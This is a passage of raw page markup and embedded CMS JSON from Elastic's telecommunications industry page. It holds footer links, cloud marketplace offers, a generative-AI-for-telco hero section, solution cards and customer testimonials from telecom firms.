href="https://secure.ethicspoint.com/domain/media/en/gui/74447/index.html">EthicsPoint portal</a><a href="/trust/business-integrity#international-trade-compliance—eccn-information">ECCN report</a><a href="mailto:ethics@elastic.co">Ethics email</a></div></li></ul><ul class="Footer_desktopNav__gXs3Z"><li><h2 class="topic-heading">Investor relations</h2><div class="Footer_innerNav__tQcnP"><a href="https://ir.elastic.co/home/default.aspx">Investor resources</a><a href="https://ir.elastic.co/governance/corporate-governance/default.aspx">Governance</a><a href="https://ir.elastic.co/financials/quarterly-results/default.aspx">Financials</a><a href="https://ir.elastic.co/stock/stock-quote/default.aspx">Stock</a></div></li><li><h2 class="topic-heading">Excellence Awards</h2><div class="Footer_innerNav__tQcnP"><a href="/blog/2022-elastic-excellence-awards-winners">Previous winners</a><a href="/elasticon">ElasticON Tour</a><a href="/events/sponsor">Become a sponsor</a><a href="/events/">All events</a></div></li></ul><div class="Footer_mobileNav__Dvl0g"><div><div data-accordion-component="Accordion" class="accordion"><div data-accordion-component="AccordionItem" class="accordion__item"><div data-accordion-component="AccordionItemHeading" role="heading" class="accordion__heading" aria-level="3"><div class="accordion__button" id="accordion__heading-raa-2317259" aria-disabled="false" aria-expanded="false" aria-controls="accordion__panel-raa-2317259" role="button" tabindex="0" data-accordion-component="AccordionItemButton"><h2 class="topic-heading p-0">About us</h2><div class="accordion__arrow"><svg class="icon-embed" width="14" height="9"><use href="/static-res/images/generic-icons.svg#chevron"></use></svg></div></div></div><div data-accordion-component="AccordionItemPanel" class="accordion__panel" id="accordion__panel-raa-2317259" hidden=""><div class="Footer_innerNav__tQcnP"><a href="/about/">About Elastic</a><a href="/about/leadership">Leadership</a><a href="/careers/diversity-and-inclusion">DE&amp;I</a><a href="/blog">Blog</a><a href="/about/press">Newsroom</a></div></div></div><div data-accordion-component="AccordionItem" class="accordion__item"><div data-accordion-component="AccordionItemHeading" role="heading" class="accordion__heading" aria-level="3"><div class="accordion__button" id="accordion__heading-raa-2317260" aria-disabled="false" aria-expanded="false" aria-controls="accordion__panel-raa-2317260" role="button" tabindex="0" data-accordion-component="AccordionItemButton"><h2 class="topic-heading p-0">Join us</h2><div class="accordion__arrow"><svg class="icon-embed" width="14" height="9"><use href="/static-res/images/generic-icons.svg#chevron"></use></svg></div></div></div><div data-accordion-component="AccordionItemPanel" class="accordion__panel" id="accordion__panel-raa-2317260" hidden=""><div class="Footer_innerNav__tQcnP"><a href="/careers">Careers</a><a href="https://jobs.elastic.co/#/">Career portal</a><a href="/careers/how-we-hire">How we hire</a></div></div></div><div data-accordion-component="AccordionItem" class="accordion__item"><div data-accordion-component="AccordionItemHeading" role="heading" class="accordion__heading" aria-level="3"><div class="accordion__button" id="accordion__heading-raa-2317261" aria-disabled="false" aria-expanded="false" aria-controls="accordion__panel-raa-2317261" role="button" tabindex="0" data-accordion-component="AccordionItemButton"><h2 class="topic-heading p-0">Partners</h2><div class="accordion__arrow"><svg class="icon-embed" width="14" height="9"><use href="/static-res/images/generic-icons.svg#chevron"></use></svg></div></div></div><div data-accordion-component="AccordionItemPanel" class="accordion__panel" id="accordion__panel-raa-2317261" hidden=""><div class="Footer_innerNav__tQcnP"><a href="https://partners.elastic.co/findapartner/">Find a partner</a><a href="https://login.elastic.co/login/partner">Partner login</a><a href="https://partners.elastic.co/English/register_email.aspx">Request access</a><a href="/partners/become-a-partner">Become a partner</a></div></div></div><div data-accordion-component="AccordionItem" class="accordion__item"><div data-accordion-component="AccordionItemHeading" role="heading" class="accordion__heading" aria-level="3"><div class="accordion__button" id="accordion__heading-raa-2317262" aria-disabled="false" aria-expanded="false" aria-controls="accordion__panel-raa-2317262" role="button" tabindex="0" data-accordion-component="AccordionItemButton"><h2 class="topic-heading p-0">Trust &amp; Security</h2><div class="accordion__arrow"><svg class="icon-embed" width="14" height="9"><use href="/static-res/images/generic-icons.svg#chevron"></use></svg></div></div></div><div data-accordion-component="AccordionItemPanel" class="accordion__panel" id="accordion__panel-raa-2317262" hidden=""><div class="Footer_innerNav__tQcnP"><a href="/trust">Trust center</a><a href="https://secure.ethicspoint.com/domain/media/en/gui/74447/index.html">EthicsPoint portal</a><a href="/trust/business-integrity#international-trade-compliance—eccn-information">ECCN report</a><a href="mailto:ethics@elastic.co">Ethics email</a></div></div></div><div data-accordion-component="AccordionItem" class="accordion__item"><div data-accordion-component="AccordionItemHeading" role="heading" class="accordion__heading" aria-level="3"><div class="accordion__button" id="accordion__heading-raa-2317263" aria-disabled="false" aria-expanded="false" aria-controls="accordion__panel-raa-2317263" role="button" tabindex="0" data-accordion-component="AccordionItemButton"><h2 class="topic-heading p-0">Investor relations</h2><div class="accordion__arrow"><svg class="icon-embed" width="14" height="9"><use href="/static-res/images/generic-icons.svg#chevron"></use></svg></div></div></div><div data-accordion-component="AccordionItemPanel" class="accordion__panel" id="accordion__panel-raa-2317263" hidden=""><div class="Footer_innerNav__tQcnP"><a href="https://ir.elastic.co/home/default.aspx">Investor resources</a><a href="https://ir.elastic.co/governance/corporate-governance/default.aspx">Governance</a><a href="https://ir.elastic.co/financials/quarterly-results/default.aspx">Financials</a><a href="https://ir.elastic.co/stock/stock-quote/default.aspx">Stock</a></div></div></div><div data-accordion-component="AccordionItem" class="accordion__item"><div data-accordion-component="AccordionItemHeading" role="heading" class="accordion__heading" aria-level="3"><div class="accordion__button" id="accordion__heading-raa-2317264" aria-disabled="false" aria-expanded="false" aria-controls="accordion__panel-raa-2317264" role="button" tabindex="0" data-accordion-component="AccordionItemButton"><h2 class="topic-heading p-0">Excellence Awards</h2><div class="accordion__arrow"><svg class="icon-embed" width="14" height="9"><use href="/static-res/images/generic-icons.svg#chevron"></use></svg></div></div></div><div data-accordion-component="AccordionItemPanel" class="accordion__panel" id="accordion__panel-raa-2317264" hidden=""><div class="Footer_innerNav__tQcnP"><a href="/blog/2022-elastic-excellence-awards-winners">Previous winners</a><a href="/elasticon">ElasticON Tour</a><a href="/events/sponsor">Become a sponsor</a><a href="/events/">All events</a></div></div></div></div></div></div></div></div></div><div class="row Footer_footerBottom__iA_rq"><div class="Footer_footnoteContainer__y0YTd"><div class="Footer_legalLinkContainer__0vR8C"><div class="text-start"><ul class="Footer_legalLinks__5LXti"><li class="Trademarks"><a href="/legal/trademarks">Trademarks</a></li><li class="Terms of Use"><a href="/legal/terms-of-use">Terms of Use</a></li><li class="Privacy"><a href="/legal/privacy-statement">Privacy</a></li><li class="Sitemap"><a href="/sitemap">Sitemap</a></li></ul><div class="Footer_copyrightDate__1vxFm"><p>© <span class="copyright-year"></span>. Elasticsearch B.V. All Rights Reserved</p></div></div></div><div class="Footer_footnote__z5kru"><p>Elastic, Elasticsearch and other related marks are trademarks, logos or registered trademarks of Elasticsearch B.V. in the United States and other countries.</p><p>Apache, Apache Lucene, Apache Hadoop, Hadoop, HDFS and the yellow elephant logo are trademarks of the <a href="https://www.apache.org/">Apache Software Foundation</a> in the United States and/or other countries. All other brand names, product names, or trademarks belong to their respective owners.</p></div></div></div></div></div></footer></div><script id="__NEXT_DATA__" type="application/json">{"props":{"pageProps":{"entry":{"uid":"blt3014d2e874448b7b","_version":28,"locale":"en-us","ACL":{},"anchor_bar":[],"banner_reference":[],"content_gallery":{"title_l10n":"","cta":{"cta_title_l10n":"","url":""}},"created_at":"2021-10-29T17:19:38.916Z","created_by":"blt3044324473ef223b70bc674c","cta_text_ribbon":{"highlights":[],"dark_mode":""},"display_in_exploration_center":false,"footer_cta_reference":[{"uid":"blta325059ea4759f18","_version":10,"locale":"en-us","ACL":{},"created_at":"2021-10-28T23:33:28.947Z","created_by":"blt3044324473ef223b70bc674c","cta":{"cta_title_l10n":"","url":""},"cta_group":[],"icon_text_card":[{"title_l10n":"AWS Marketplace","_metadata":{"uid":"csd722b679339ac543"},"image":null,"subtitle_l10n":"\u003cp\u003eElastic Cloud on AWS gives users the ability to run pre-built SaaS solutions for search, observability, and security. Start a free trial.\u003c/p\u003e","url":"https://aws.amazon.com/marketplace/pp/Elasticsearch-Inc-Elasticsearch-Service-on-Elastic/B01N6YCISK","paragraph_l10n":"\u003cp\u003eElastic Cloud on AWS gives users the ability to run pre-built SaaS solutions for search, observability, and security. Start a free trial.\u003c/p\u003e","cta":{"url":"https://aws.amazon.com/marketplace/pp/Elasticsearch-Inc-Elasticsearch-Service-on-Elastic/B01N6YCISK"}},{"title_l10n":"Azure Marketplace","_metadata":{"uid":"cs4da0faa45278212c"},"image":null,"subtitle_l10n":"\u003cp\u003eElastic on Microsoft Azure gives you the ability to deploy Elasticsearch directly within the Azure portal. \n\u003c/p\u003e","url":"https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.ec-azure-pp?tab=Overview","paragraph_l10n":"\u003cp\u003eElastic on Microsoft Azure gives you the ability to deploy Elasticsearch directly within the Azure portal. \n\u003c/p\u003e","cta":{"url":"https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.ec-azure-pp?tab=Overview"}},{"title_l10n":"Google Marketplace","_metadata":{"uid":"cs64d53f53f55c755b"},"image":null,"subtitle_l10n":"\u003cp\u003eDeploy on Google Cloud so you can derive powerful, real-time insights from your data in minutes. \n\u003c/p\u003e","url":"https://console.cloud.google.com/marketplace/details/endpoints/elasticsearch-service.gcpmarketplace.elastic.co","paragraph_l10n":"\u003cp\u003eDeploy on Google Cloud so you can derive powerful, real-time insights from your data in minutes. \n\u003c/p\u003e","cta":{"url":"https://console.cloud.google.com/marketplace/details/endpoints/elasticsearch-service.gcpmarketplace.elastic.co"}},{"title_l10n":"Elastic Cloud trial","_metadata":{"uid":"csfa27fa0008f446d8"},"image":null,"subtitle_l10n":"\u003cp\u003eWe handle the maintenance and upkeep, so you can focus on gaining the insights that help you run your business.\n\u003c/p\u003e","url":"https://cloud.elastic.co/registration","paragraph_l10n":"\u003cp\u003eWe handle the maintenance and upkeep, so you can focus on gaining the insights that help you run your business.\n\u003c/p\u003e","cta":{"url":"https://cloud.elastic.co/registration"}}],"paragraph_l10n":"\u003cp\u003ePurchase through your marketplace of choice to consolidate your cloud bill and leverage your existing cloud spending commitments. See all the regions we support on our \u003ca href=\"/cloud/regions\"\u003eregions page\u003c/a\u003e.\n\u003c/p\u003e","tags":[],"title":"Industries - Elastic Cloud, your way","title_l10n":"Elastic Cloud, your way","updated_at":"2024-10-23T23:11:27.068Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-10-28T19:42:24.040Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"hero":[{"_version":10,"locale":"en-us","uid":"blte1d75184d7761b6b","ACL":{},"asset_border_radius":null,"callout":[],"content_blocks":[],"created_at":"2021-10-29T17:14:08.863Z","created_by":"blt3044324473ef223b70bc674c","cta":[{"type":null,"cta_title_l10n":"Watch video","_metadata":{"uid":"cs1ebd4f98f9af345d"},"url":"#the-power-of-generative-ai-for-telco","cta_icon":{"file":null,"position":"right"},"cta_footnote_l10n":""},{"type":null,"cta_title_l10n":"Download brief","_metadata":{"uid":"cs3e19c9151776381e"},"url":"/telecommunications/unlocking-the-power-of-generative-ai","cta_icon":{"file":null,"position":null},"cta_footnote_l10n":""}],"download_cta":{"cta_title_l10n":"","url":""},"form_special_label_l10n":"","hero_banner_pattern":["blt67ada986991e470d"],"icon":null,"image":null,"image_alt_text_l10n":"","logo":null,"logos_below_cta":{"logos":[],"topic_heading_l10n":""},"overflow":false,"paragraph_l10n":"\u003cp\u003eGenerative AI presents an opportunity for telco organizations to drive AI-powered customer and employee experiences. Explore how telco organizations can leverage generative AI and how to get started.\u003c/p\u003e","product_name":"","shadow":true,"spacing_bottom":null,"spacing_top":null,"styles":{"container_background":null,"modules_background":null,"pattern_type":"generic","show_divider":false,"enable_display_font_size":false},"subtitle_l10n":"","tags":[],"title":"Telco - Generative AI for telco","title_l10n":"Generative AI for telco","topic_heading_l10n":"Telecommunications","two_column_layout":true,"updated_at":"2024-07-19T13:24:38.908Z","updated_by":"blt3e52848e0cb3c394","vidyard":{"video_id":"","uuid":"jPKKP8TVkRWokQd7ex9XpE","video_play_count":"auto","muted":true,"loop_video":true,"hide_controls":true,"looping_animation":false},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-07-22T10:47:23.386Z","user":"blt3e52848e0cb3c394"}}],"layout_spacing":null,"modular_blocks":[{"card":{"title_l10n":"Gain complete visibility into next-gen networks","_metadata":{"uid":"cs9c5e405c8ecfb371"},"card_reference":[{"uid":"blt28508c8455e6e7bb","_version":9,"locale":"en-us","ACL":{},"below_card_modular_blocks":[],"card_deck_style":{"type":"illustration text grid 3x1","background_color":"","border_color":"","border_direction":null,"border_radius":"10px","component_container_background_color":"","padding":null,"per_row":null,"shadow":null,"shadow_hover":null,"image_alignment":"left align","paragraph_alignment":null,"text_alignment":null,"title_heading_alignment":null,"topic_heading_alignment":null,"image_border_color":"","image_border_style":"","image_border_width":"","image_filter":"","component_container_border_radius":"","component_container_padding":null},"card_modular_blocks":[{"card":{"title_l10n":"Manage distributed networks","_metadata":{"uid":"cs7e4239ee51ab7956"},"modular_blocks":[{"image":{"type":"image-xsmall","file":{"_version":4,"is_dir":false,"uid":"blt80f78dbbb85f42a0","ACL":{},"content_type":"image/svg+xml","created_at":"2020-05-20T21:59:14.555Z","created_by":"blt3044324473ef223b70bc674c","description":"","file_size":"143706","filename":"illustration-people-channels-128.svg","parent_uid":"blt19bfea3747fb788b","tags":[],"title":"illustration-people-channels-128.svg","updated_at":"2023-06-21T00:27:55.582Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-23T21:09:49.629Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt80f78dbbb85f42a0/6492440bb9a07659f19282d1/illustration-people-channels-128.svg"},"_metadata":{"uid":"csdc3d345d254a4d96"},"alt_text_l10n":""}},{"title":{"title_l10n":"Manage distributed networks","_metadata":{"uid":"cse7defe7314327098"},"url":"","size_title":null}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eHear from the Elastic industry team on how telecom companies are managing their core networks with Elastic.\u003c/p\u003e","_metadata":{"uid":"cs7c9109b516c9b601"}}},{"cta":{"alignment":"left align","width":"block","list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs39c3acad2c9099eb"},"icon_direction":null,"title_l10n":"Learn more","url":"/elasticon/archive/2021/global/enable-real-time-insights-at-scale-for-telco-to-solve"}],"_metadata":{"uid":"csd2c3f48d51b4222a"}}}],"style":{"background_color":"","border_color":"","border_direction":null}}},{"card":{"title_l10n":"Scale efficiently in the cloud","_metadata":{"uid":"cscf922e7447b3f17d"},"modular_blocks":[{"image":{"type":"image-xsmall","file":{"_version":3,"is_dir":false,"uid":"blt7e1a162341d630e8","ACL":{},"content_type":"image/svg+xml","created_at":"2021-11-09T01:14:12.535Z","created_by":"blt3044324473ef223b70bc674c","description":"","file_size":"215851","filename":"illustration-cloud-services-security-posture-target-128.svg","parent_uid":"blt19bfea3747fb788b","tags":[],"title":"illustration-cloud-services-security-posture-target-128.svg","updated_at":"2023-10-31T06:37:38.699Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-10-31T06:38:32.301Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7e1a162341d630e8/6540a0b262f244001b7d9257/illustration-cloud-services-security-posture-target-128.svg"},"_metadata":{"uid":"cs72b8bcc62132a7dd"},"alt_text_l10n":""}},{"title":{"title_l10n":"Scale efficiently in the cloud","_metadata":{"uid":"cs31cd71d76b6550c7"},"url":"","size_title":null}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eFind out how a leading telecom provider realized a \u003cstrong\u003e283% ROI\u003c/strong\u003e with a payback period of \u003cstrong\u003e1.7 years\u003c/strong\u003e after deploying Elastic Cloud.\n\u003c/p\u003e","_metadata":{"uid":"cs5d3feb25fcbf6d81"}}},{"cta":{"alignment":"left align","width":"block","list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs3484a42b628487dc"},"icon_direction":null,"title_l10n":"Learn more","url":"/global-telecom-provider-realized-283-percent-roi-with-elastic-cloud"}],"_metadata":{"uid":"csd405155fdc8bde60"}}}],"style":{"background_color":"","border_color":"","border_direction":null}}},{"card":{"title_l10n":"Prevent frauds and cyber attacks","_metadata":{"uid":"csc21a4fae3bf54a8c"},"modular_blocks":[{"image":{"type":"image-xsmall","file":{"uid":"blt9d6b5f42b0641e4a","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-04-06T18:54:07.840Z","updated_at":"2023-06-21T01:29:47.083Z","content_type":"image/svg+xml","file_size":"226206","filename":"illustration-security-lock-128.svg","title":"illustration-security-lock-128.svg","ACL":{},"_version":2,"is_dir":false,"tags":[],"parent_uid":"blt19bfea3747fb788b","description":"","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-21T22:12:46.803Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9d6b5f42b0641e4a/6492528b0f2d9b16c2ed693a/illustration-security-lock-128.svg"},"_metadata":{"uid":"cs8d4aec9c1f1dd4f9"},"alt_text_l10n":""}},{"title":{"title_l10n":"Prevent frauds and cyber attacks","_metadata":{"uid":"cs256114f807e8efd0"},"url":"","size_title":null}},{"paragraph":{"paragraph_l10n":"\u003cp\u003eDownload the total economic impact study from Forrester Consulting, which spotlights the combined benefits of protecting and observing applications and services.\n\u003c/p\u003e","_metadata":{"uid":"csc4a27af8c88ca1df"}}},{"cta":{"alignment":"left align","width":"block","list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs75f839f799590082"},"icon_direction":null,"title_l10n":"Learn more","url":"/elastic-stack/2021-total-economic-impact-elastic-observability-security?elektra=products-security-siem\u0026storm=cta1\u0026rogue=forrester-tei-gic"}],"_metadata":{"uid":"cs9c207489ce5eb864"}}}],"style":{"background_color":"","border_color":"","border_direction":null}}}],"created_at":"2021-11-04T18:18:19.225Z","created_by":"blt3044324473ef223b70bc674c","spotlight_modular_blocks":[],"tags":[],"title":"Telco - Reimagine telecom with unified visibility","title_text":{"topic_heading_l10n":"Break down network and business silos","title_l10n":"Reimagine telecom with unified visibility","paragraph_l10n":"\u003cp\u003eLeading telecom providers worldwide trust Elastic to expand their digital services footprint by helping them deliver the next-gen telecom experiences. With proven solutions built on a single search intelligence platform, Elastic enables actionable insights into networks, support systems, and customer behavior that align with business objectives.\u003c/p\u003e","modular_blocks":[{"cta":{"alignment":"center align","width":null,"list":[{"type":"tertiary","file":null,"_metadata":{"uid":"cs7226500fc3ee2b01"},"icon_direction":null,"title_l10n":"Download the guide","url":"/industries/telecommunications/enable-real-time-insights-at-telco-scale"}],"_metadata":{"uid":"cs70051163f644a476"},"footnote_l10n":""}}],"style":{"dark_mode":"","layout":null,"left_align_text":false,"two_column_layout":false,"title_heading_size":"H2"}},"updated_at":"2023-06-23T21:01:35.441Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"time":"2023-10-31T06:38:23.158Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"background_color_for_component_container":"","background_color_for_cards":""}},{"generic_body":{"title_l10n":"Quotes","_metadata":{"uid":"cs268156aee0c184ee"},"reference":[{"_version":2,"locale":"en-us","uid":"bltded191d0f483ccb0","ACL":{},"created_at":"2022-03-07T16:33:38.636Z","created_by":"blt3e52848e0cb3c394","enable_thumbnails":false,"quote_reference":[{"title":"Krishna Reddy, Director, Verizon","topic_heading_l10n":"","logo":null,"logo_left_aligned":null,"quote_l10n":"When we started using Elasticsearch, we recognized its promise. We could see that this would be part of our future. Our engineers were able to get the full stack up and running in just thirty minutes. It was simple. It was well thought out.","quote_author_l10n":"Krishna Reddy","quote_details_l10n":"Director, Verizon","quote_banner_pattern":["bltfdf1762f0006d947"],"cta":[],"image":null,"quote":"","quote_author":"","quote_details":"","tags":[],"locale":"en-us","uid":"blt0c2d53840e09d463","created_by":"blt3e52848e0cb3c394","updated_by":"blt3e52848e0cb3c394","created_at":"2022-03-07T16:33:24.193Z","updated_at":"2022-03-07T16:50:02.351Z","ACL":{},"_version":2,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-03-08T14:00:45.264Z","user":"blt3e52848e0cb3c394"}},{"title":"Oscar Narváez, Tools \u0026 Analytic Monitoring Team Leader, Entel","topic_heading_l10n":"","logo":null,"logo_left_aligned":null,"quote_l10n":"The Elastic Stack represents the backbone of the digital transformation project to give us visibility to Entel as a whole.","quote_author_l10n":"Oscar Narváez","quote_details_l10n":"Tools \u0026 Analytic Monitoring Team Leader, Entel","quote_banner_pattern":["bltfdf1762f0006d947"],"cta":[],"image":null,"quote":"","quote_author":"","quote_details":"","tags":[],"locale":"en-us","uid":"bltbc03cf31818e8577","created_by":"blt3e52848e0cb3c394","updated_by":"blt3e52848e0cb3c394","created_at":"2022-03-07T16:50:34.402Z","updated_at":"2022-03-07T16:50:34.402Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-03-08T14:00:45.272Z","user":"blt3e52848e0cb3c394"}},{"title":"Álvaro Aldana, Global Video Monitoring Technical Lead, Telefónica","topic_heading_l10n":"","logo":null,"logo_left_aligned":null,"quote_l10n":"We are now able to explore our data in new and different ways, within one scalable platform and move to a model where we’re innovating and optimizing rather than monitoring and maintaining.","quote_author_l10n":"Álvaro Aldana","quote_details_l10n":"Global Video Monitoring Technical Lead, Telefónica","quote_banner_pattern":["bltfdf1762f0006d947"],"cta":[],"image":null,"quote":"","quote_author":"","quote_details":"","tags":[],"locale":"en-us","uid":"blte50772f6f6899119","created_by":"blt3e52848e0cb3c394","updated_by":"blt3e52848e0cb3c394","created_at":"2022-03-07T16:51:15.807Z","updated_at":"2022-03-07T16:51:15.807Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-03-08T14:00:45.280Z","user":"blt3e52848e0cb3c394"}},{"title":"Jeremy Foran, Technology Specialist, BAI Communications","topic_heading_l10n":"","logo":null,"logo_left_aligned":null,"quote_l10n":"It is not every day that sales and marketing says, ‘Give the folks in IT whatever they need’. But, with the Elastic system we gave them, that’s exactly what happened for us.","quote_author_l10n":"Jeremy Foran","quote_details_l10n":"Technology Specialist, BAI Communications","quote_banner_pattern":["bltfdf1762f0006d947"],"cta":[],"image":null,"quote":"","quote_author":"","quote_details":"","tags":[],"locale":"en-us","uid":"blta8b9874e9587956b","created_by":"blt3e52848e0cb3c394","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-03-07T16:52:07.961Z","updated_at":"2022-03-07T22:05:45.826Z","ACL":{},"_version":2,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-03-08T14:00:45.288Z","user":"blt3e52848e0cb3c394"}}],"tags":[],"title":"Telco","updated_at":"2022-03-07T16:52:28.844Z","updated_by":"blt3e52848e0cb3c394","_content_type_uid":"quotes_carousel","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-17T16:09:10.998Z","user":"blt3044324473ef223b70bc674c"}}],"dark_mode":""}},{"generic_body":{"title_l10n":"Text Image River layout - Monetize 5G","_metadata":{"uid":"csfa1ce75ced4cf135"},"reference":[{"_version":1,"locale":"en-us","uid":"blt8f75ffaac647cdaa","ACL":{},"created_at":"2022-08-12T11:48:53.944Z","created_by":"blt3e52848e0cb3c394","dark_mode":"","dark_mode_even_rows":false,"module":[{"icon":{"type":null,"file":null,"alt_text":""},"_metadata":{"uid":"cs4d31b9bfb3b79c5f"},"topic_heading_l10n":"","title_l10n":"Monetize 5G","paragraph_l10n":"\u003cp\u003eGet more out of data by breaking down silos to deliver telco-as-a-service. Fine-tune network and cloud parameters to deliver guaranteed quality of service for network slicing.\n\u003c/p\u003e","cta":{"alignment":"left align","width":"block","list":[]},"quote":[],"reference":[{"_content_type_uid":"image_reference","_version":1,"locale":"en-us","uid":"blt3465eb0478e2d9e1","ACL":{},"alt_text_l10n":"Illustration","caption_l10n":"","created_at":"2022-08-12T11:45:25.352Z","created_by":"blt3e52848e0cb3c394","image":{"_version":1,"is_dir":false,"uid":"blt2036df43444fee8c","ACL":{},"content_type":"image/png","created_at":"2022-05-12T00:59:45.323Z","created_by":"blt3044324473ef223b70bc674c","file_size":"93082","filename":"illustration-currency-value-scale-1216x860.png","parent_uid":null,"tags":[],"title":"illustration-currency-value-scale-1216x860.png","updated_at":"2022-05-12T00:59:45.323Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T01:16:27.617Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2036df43444fee8c/627c5c017198441d81b4dff0/illustration-currency-value-scale-1216x860.png"},"mobile_image":null,"shadow":false,"tags":[],"title":"illustration-currency-value-scale-1216x860.png","updated_at":"2022-08-12T11:45:25.352Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-12T11:45:35.733Z","user":"blt3e52848e0cb3c394"}}],"below_paragraph_reference":[],"below_component_reference":[],"dark_mode":""},{"icon":{"type":null,"file":null,"alt_text":""},"_metadata":{"uid":"csaff3f65fbdebc5f7"},"topic_heading_l10n":"","title_l10n":"Automate workflows","paragraph_l10n":"\u003cp\u003eAutomate workflows in business and operational support systems. Implement ML-based rules for the DevSecOps continuum, even as data and software continue to grow.\n\u003c/p\u003e","cta":{"alignment":"left align","width":"block","list":[]},"quote":[],"reference":[{"_content_type_uid":"image_reference","_version":1,"locale":"en-us","uid":"blt0a2b52e4f6ed2f9c","ACL":{},"alt_text_l10n":"Illustration","caption_l10n":"","created_at":"2022-08-12T11:46:54.698Z","created_by":"blt3e52848e0cb3c394","image":{"_version":1,"is_dir":false,"uid":"blted380dfa0efceadf","ACL":{},"content_type":"image/png","created_at":"2022-05-12T01:00:43.222Z","created_by":"blt3044324473ef223b70bc674c","file_size":"140388","filename":"illustration-dev-sec-ops-cloud-automations-1216x840.png","parent_uid":null,"tags":[],"title":"illustration-dev-sec-ops-cloud-automations-1216x840.png","updated_at":"2022-05-12T01:00:43.222Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T01:16:27.609Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blted380dfa0efceadf/627c5c3b220ab5285f52d685/illustration-dev-sec-ops-cloud-automations-1216x840.png"},"mobile_image":null,"shadow":false,"tags":[],"title":"illustration-dev-sec-ops-cloud-automations-1216x840.png","updated_at":"2022-08-12T11:46:54.698Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-12T11:47:01.741Z","user":"blt3e52848e0cb3c394"}}],"below_paragraph_reference":[],"below_component_reference":[],"dark_mode":""},{"icon":{"type":null,"file":null,"alt_text":""},"_metadata":{"uid":"cs8267b6abc65af8e5"},"topic_heading_l10n":"","title_l10n":"Protect your brand","paragraph_l10n":"\u003cp\u003eIntegrate seamlessly with legacy and next-generation solutions to elevate the collective IQ of your team. Use a single source of truth throughout the organization.\n\u003c/p\u003e","cta":{"alignment":"left align","width":"block","list":[]},"quote":[],"reference":[{"_content_type_uid":"image_reference","_version":1,"locale":"en-us","uid":"bltcd2cd6f4b12f8fa9","ACL":{},"alt_text_l10n":"Illustration","caption_l10n":"","created_at":"2022-08-12T11:48:16.160Z","created_by":"blt3e52848e0cb3c394","image":{"_version":1,"is_dir":false,"uid":"blt648ad5b483eade22","ACL":{},"content_type":"image/png","created_at":"2022-05-12T01:01:59.045Z","created_by":"blt3044324473ef223b70bc674c","file_size":"87334","filename":"illustration-site-search-heart-magnifying-glass-light-1216x840.png","parent_uid":null,"tags":[],"title":"illustration-site-search-heart-magnifying-glass-light-1216x840.png","updated_at":"2022-05-12T01:01:59.045Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T01:16:27.602Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt648ad5b483eade22/627c5c878e09542a15b92080/illustration-site-search-heart-magnifying-glass-light-1216x840.png"},"mobile_image":null,"shadow":false,"tags":[],"title":"illustration-site-search-heart-magnifying-glass-light-1216x840.png","updated_at":"2022-08-12T11:48:16.160Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-12T11:48:23.648Z","user":"blt3e52848e0cb3c394"}}],"below_paragraph_reference":[],"below_component_reference":[],"dark_mode":""}],"reverse_layout":true,"tags":[],"title":"Telco - Monetize 